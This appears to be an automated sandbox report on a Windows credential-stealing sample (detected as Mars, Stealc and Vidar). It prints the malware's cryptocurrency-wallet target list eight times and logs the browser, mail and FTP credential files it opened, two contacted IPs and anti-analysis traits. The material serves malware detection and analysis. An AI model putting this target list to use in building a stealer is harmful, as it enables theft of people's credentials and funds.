Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.0000000000914000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.0000000000914000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.0000000000914000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.0000000000914000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.0000000000914000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.0000000000914000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.0000000000914000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.0000000000914000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: tAa6xNsucX.exe PID: 6532, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Mars stealer
Source: Yara match File source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2305011823.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 00000000.00000002.2304071459.00000000007D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: tAa6xNsucX.exe PID: 6532, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2305011823.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: tAa6xNsucX.exe PID: 6532, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1463440 Sample: tAa6xNsucX.exe Startdate: 27/06/2024 Architecture: WINDOWS Score: 100 59 Snort IDS alert for network traffic 2->59 61 Multi AV Scanner detection for domain / URL 2->61 63 Found malware configuration 2->63 65 15 other signatures 2->65 8 tAa6xNsucX.exe 37 2->8         started        13 explortu.exe 2->13         started        15 explortu.exe 2->15         started        17 3 other processes 2->17 process3 dnsIp4 45 85.28.47.4, 49705, 80 GES-ASRU Russian Federation 8->45 47 77.91.77.81, 49706, 80 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 8->47 37 C:\Users\user\AppData\...\HIIEBAFCBK.exe, PE32 8->37 dropped 39 C:\Users\user\AppData\...\softokn3[1].dll, PE32 8->39 dropped 41 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 8->41 dropped 43 11 other files (7 malicious) 8->43 dropped 75 Detected unpacking (changes PE section rights) 8->75 77 Tries to steal Mail credentials (via file / registry access) 8->77 79 Found many strings related to Crypto-Wallets (likely being stolen) 8->79 87 4 other signatures 8->87 19 cmd.exe 1 8->19         started        21 cmd.exe 2 8->21         started        81 Hides threads from debuggers 13->81 83 Tries to detect sandboxes / dynamic malware analysis system (registry check) 13->83 85 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 13->85 file5 signatures6 process7 process8 23 HIIEBAFCBK.exe 4 19->23         started        27 conhost.exe 19->27         started        29 conhost.exe 21->29         started        file9 35 C:\Users\user\AppData\Local\...\explortu.exe, PE32 23->35 dropped 67 Antivirus detection for dropped file 23->67 69 Detected unpacking (changes PE section rights) 23->69 71 Machine Learning detection for dropped file 23->71 73 5 other signatures 23->73 31 explortu.exe 12 23->31         started        signatures10 process11 dnsIp12 49 